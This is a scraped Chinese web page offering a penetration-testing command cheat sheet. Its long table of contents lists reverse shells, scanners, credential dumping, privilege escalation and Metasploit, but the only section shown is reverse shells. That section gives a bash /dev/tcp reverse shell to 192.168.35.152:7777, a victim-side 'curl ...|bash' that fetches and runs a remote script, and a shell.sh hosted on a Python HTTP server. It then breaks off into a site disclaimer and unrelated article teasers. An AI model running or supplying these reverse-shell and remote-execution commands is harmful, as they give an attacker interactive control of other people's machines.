攻防渗透常用命令速查

攻防渗透常用命令速查

建议配合CTRL+F进行查询

目录

  • 攻防渗透常用命令速查
    • 目录
    • 反弹Shell
      • bash
      • curl
      • http
      • java
      • ssh无记录shell
      • python交互shell
      • 图片马制作
    • 按首字母排序
      • AlliN
      • Arjun
      • dirsearch
      • dirmap
      • EHole
      • ENScan_GO
      • find
      • ffuf
      • fscan
      • grep
      • hping3
      • hydra
      • JNDI
      • HackBrowerserData
      • kscan
      • ksubdomain
      • mysql
      • medusa
      • nmap
      • OneForAll
      • scaninfo
      • sqlmap
      • TideFinger
      • URLFinder
      • Vulmap
      • Xray
    • 数据库连接
      • Redis
      • Postgresql
    • 内网信息收集
      • 重要端口及服务
      • Windows信息收集
        • 查找文件 find/findstr
        • 设置活动代码页编号 chcp
        • 查看系统信息 systeminfo
        • 查看环境变量 set
        • 查看网络配置信息 ipconfig
        • 查看当前用户信息 whoami
        • 查看路由表 route
        • 查看arp缓存表 arp
        • 查看用户信息 net user/localgroup
        • 查看主机开启时间 net statistics
        • 查看安装软件及版本信息 wmic product
        • 利用PowerShell收集软件版本信息
        • 查看本机服务信息 wmic service
        • 查看补丁信息 wmic qfe
          • metasploit enum_patches
          • windows exploit suggester
        • 查看共享列表 wmic share
        • 查看进程列表 tasklist
        • 查看计划任务 schtasks
        • 查看端口信息 netstat
        • 查看防火墙配置 netsh
        • 查看wifi信息
        • 查看网络代理信息
        • 查看PPTP配置信息
        • 查看RDP远程桌面信息
        • 查看数据库密码
        • 查看服务信息 sc query
        • 导出注册表信息 reg
        • 导出日志信息
        • 查看hosts文件
        • 查看中间件信息
        • 查看组策略 gpresult
        • 查看启动项
        • 抓取密码 mimikatz
        • 浏览器密码
        • 查看回收站
        • 查看域信息 nltest/net
      • Linux信息收集
        • 操作系统基本信息
        • 系统环境信息
        • 系统服务信息
        • 系统软件信息
        • 系统任务和作业
        • 用户信息和组信息
        • 用户和权限信息
        • 系统网络和路由信息
        • 获取其他信息
      • 域内信息收集
        • 判断是否存在域
          • ipconfig
          • 查看系统详细信息 systeminfo
          • 查看当前登录域与域用户 netconfig
          • 判断主域 net time
        • 收集域内基础信息
          • 查看域 net view
          • 查看域内计算机 net view
          • 查看域内用户组列表 net group
          • 查看域管理员列表 net group
          • 查看企业管理员列表 net group
        • 查看域内置administrator组用户
          • 查看域密码策略信息 net accounts
          • 查看域信任信息 nltest
        • 收集域用户和管理员信息
          • 查询域用户列表 net user
          • 查询域用户详细信息 wmic useraccount
          • 查询存在的用户
        • 收集域控制器信息
          • 查看域控主机名
          • 查看域控制器列表 net group
        • 查找域管理员进程
          • 获取域管理员列表
          • 列出本机的所有进程及进程用户
        • 定位域管理员
          • psloggedon查询
          • netview查询
    • 内网穿透代理
      • Neo-reGeorg
      • ssh
      • nps
      • frp
    • 内网权限提升
      • Windows系统提权
      • Linux系统提权
    • 内网渗透工具
      • CobaltStrike
      • Metasploit
        • msfconsole辅助模块(Auxiliary)
        • msfconsole后渗透攻击模块 (Post)
        • msfconsole渗透攻击模块(Exploit)
        • msfenvom生成shell code
        • msfenvom生成可执行文件
        • Meterpreter常用命令
      • 各种shell的相互转换
        • msf派生shell给cobalt Strike
        • cobalt Strike联动msf
        • command shell转meterpreter
        • meterpreter转command shell
    • 内网其他命令
      • 3389端口开放
      • powershell文件下载

反弹Shell

常用反弹shell方式如下(bash/curl/http),其他反弹shell方式参考:Click Here

bash

bash -i >& /dev/tcp/192.168.35.152/7777 0>&1

curl

攻击方:

cat bash.html
/bin/bash -i >& /dev/tcp/192.168.35.152/7777 0>&1

被控端:

curl 192.168.35.152/bash.html|bash

http

攻击方:

# 编写shell脚本并启动http服务器
echo "bash -i >& /dev/tcp/192.168.35.152/7777 0>&1" > shell.sh
python2环境下:python -m SimpleHTTPServer

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/184595.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

办公用品领用管理系统能做什么?如何优化企业运营管理工作?

办公用品领用管理系统能做什么?如何优化企业运营管理工作?

办公用品相对于公司其他的固定资产来说,大多数都属于低值易耗品,东西虽小但必须要有,且种类较多,因此制定适当的制度对于日常管理来说是十分必要的流程,行政人员也需要根据不同的需求去进一步的完善。然而,…
阅读更多...
maven 常用命令解析

maven 常用命令解析

目录 maven 是什么 Maven 目录结构 maven 常用命令解析 mvn clean mvn validate mvn compile mvn test mvn package mvn verify mvn install mvn site mvn deploy maven 是什么 Maven 是一个流行的项目管理和构建工具,用于帮助开发人员管理 Java 项目的…
阅读更多...
【动态规划】LeetCode-1137.第N个泰波那契数

【动态规划】LeetCode-1137.第N个泰波那契数

🎈算法那些事专栏说明:这是一个记录刷题日常的专栏,每个文章标题前都会写明这道题使用的算法。专栏每日计划至少更新1道题目,在这立下Flag🚩 🏠个人主页:Jammingpro 📕专栏链接&…
阅读更多...
【产品经理】AI在SaaS产品中的应用及挑战

【产品经理】AI在SaaS产品中的应用及挑战

随着ChatGPT大模型在全球的爆火,AI迅速在各个行业内,助力于各行业的效率提升。而SaaS领域,AI同样也大有可为。 AI(人工智能,Artificial Intelligence的缩写)近一年来一直处于舆论风口,随着ChatG…
阅读更多...
「Linux」进程等待与替换

「Linux」进程等待与替换

💻文章目录 📄前言进程等待进程等待的概念进程等待的方法 进程替换进程替换的概念替换方式 📓总结 📄前言 在如今的时代,多进程编程已经变成了必不可少的一部分,而进程等待、进程替换这两个概念都是作为多进…
阅读更多...
如何使用1688店铺所有商品API接口

如何使用1688店铺所有商品API接口

一、引言 随着电商行业的快速发展,越来越多的商家选择在1688平台上开店销售商品。然而,手动抓取店铺商品信息不仅效率低下,而且容易出错。为了解决这个问题,我们可以使用1688开放平台提供的API接口,实现一键获取店铺所…
阅读更多...
【matlab程序】图像最大化填充画布

【matlab程序】图像最大化填充画布

【matlab程序】图像最大化填充画布 不做任何修饰: 修饰: 图片 往期推荐 图片 【python海洋专题一】查看数据nc文件的属性并输出属性到txt文件 【python海洋专题二】读取水深nc文件并水深地形图 【python海洋专题三】图像修饰之画布和坐标轴 【Pytho…
阅读更多...
2023-简单点-树莓派-camera module 3介绍

2023-简单点-树莓派-camera module 3介绍

Raspberry Pi Camera Module 3 介绍开头先说,注意事项libcamera感光芯片和驱动的兼容图额外:不同module的对应的参数图用bullseye系统测试摄像头预览窗口拍摄静态图片bayer raw图像获取超长曝光视频流raw视频流 ref 介绍 树莓派镜像在Bullseye版本之后&…
阅读更多...
高效的将两个文件夹中多余的文件删除

高效的将两个文件夹中多余的文件删除

高效的将两个文件夹中多余的文件删除 解决方案 之前使用的是这个方法,但是图像太多,需要删除的有70W张,得删10多天。。 将两个文件夹中重复的图象删除 解决方案 先将image图像复制一份,然后改名为txt import osdef change_file…
阅读更多...
论文笔记:Confidential Assets

论文笔记:Confidential Assets

Confidential Assets 描述了一种称为“保密交易”的方案,该方案模糊了所有UTXO的金额,同时保持了不创建或销毁硬币的公共可验证性。进一步将此方案扩展到“保密资产”,一种单一的基于区块链的分类帐可以跟踪多种资产类型的方案。将保密交易扩…
阅读更多...
Vue3-toRef 和 toRefs 函数

Vue3-toRef 和 toRefs 函数

Vue3-toRef 和 toRefs 函数 功能:可以简化语法调用。toRef 函数执行时会生成一个对象 ObjectRefImpl ,是一个引用对象,具有value属性(getter 和 setter 属性)语法格式:toRef(对象名, 对象中的属性名) toRe…
阅读更多...
Attention机制(笔记)

Attention机制(笔记)

参考:2.3.2注意力机制-part1_哔哩哔哩_bilibili 什么是attention? 答:注意力放在事物最有辨识度的部分 attention计算机制: 为什么用这个公式可以得到attention? 补充说明(chatGPT给出的解释)&…
阅读更多...
sql关联另一个表,update表的值

sql关联另一个表,update表的值

sql示例: update student_score ss set ss.names.name from student s where ss.codes.code 最常见的学生成绩表 student_score通过学生student_code关联学生信息表student 学生信息表(student): code name age gender 1001 …
阅读更多...
优先队列经典例题leetcode思路代码详解

优先队列经典例题leetcode思路代码详解

目录 leetcode215题.数组中的第k个最大元素 leetcode347题.前k个高频元素 leetcode295题.数据流的中位数 对优先队列感兴趣的朋友可以去看我上一篇文章。 优先队列基础讲解-CSDN博客 leetcode215题.数组中的第k个最大元素 215. 数组中的第K个最大元素 - 力扣(…
阅读更多...
值得收藏的15 个好用的 iPad/iPhone 数据恢复工具

值得收藏的15 个好用的 iPad/iPhone 数据恢复工具

有时您需要从移动或平板设备恢复关键数据。 许多人已经开始在手机上存储重要文件,因为他们可以在旅途中或现在几乎在任何情况下轻松访问数据。 不言而喻; 您只需在手机上轻轻一按,即可轻松访问电子邮件、共享图片、编辑和共享文档、支付账单等。一般来…
阅读更多...
【Openstack Train安装】七、glance安装

【Openstack Train安装】七、glance安装

Glance是为虚拟机的创建提供镜像的服务,我们基于Openstack是构建基本的IaaS平台对外提供虚拟机,而虚拟机在创建时必须为选择需要安装的操作系统,Glance服务就是为该选择提供不同的操作系统镜像。Glance提供Restful API可以查询虚拟机镜像的me…
阅读更多...
ios(swiftui) 属性包装器详解

ios(swiftui) 属性包装器详解

目录 1. State 2. Binding 3. ObservedObject 和Published 4. StateObject 5. EnvironmentObject和Environment 6. AppStorage 在 SwiftUI 中,属性包装器用于增强和管理视图的状态,以及处理视图与数据模型之间的绑定和交互。下面是一些常见…
阅读更多...
Flutter创建TabBar

Flutter创建TabBar

使用TabBar和TabBarView来创建一个包含"首页"、"分类"和"我的"的TabBar。每个Tab对应一个Tab控件,TabBarView中的每个页面对应一个Widget。 1.Tab使用自定义图标和颜色 一般UI设计的图会带渐变色之类的,应该保持图片的原…
阅读更多...
【实战教程】PHP如何轻松对接阿里云直播?

【实战教程】PHP如何轻松对接阿里云直播?

1. 配置阿里云直播的推流地址和播放地址 使用阿里云直播功能前,首先需要在阿里云控制台中创建直播应用,然后获取推流地址和播放地址。 推流地址一般格式为: rtmp://{Domain}/{AppName}/{StreamName}?auth_key{AuthKey}-{Timestamp}-{Rand…
阅读更多...
vuepress-----5、SEO

vuepress-----5、SEO

# 5、SEO 标题描述信息作者faviconkeywords 图标下载:https://favicon.io/ (opens new window) 个人博客SEO属性设置 module.exports { title: "小邵子",description: 小邵子的个人笔记,head: [[link, { rel: icon, href: /favicon.ico }],[meta, { …
阅读更多...
最新文章

Copyright @ 2022~2023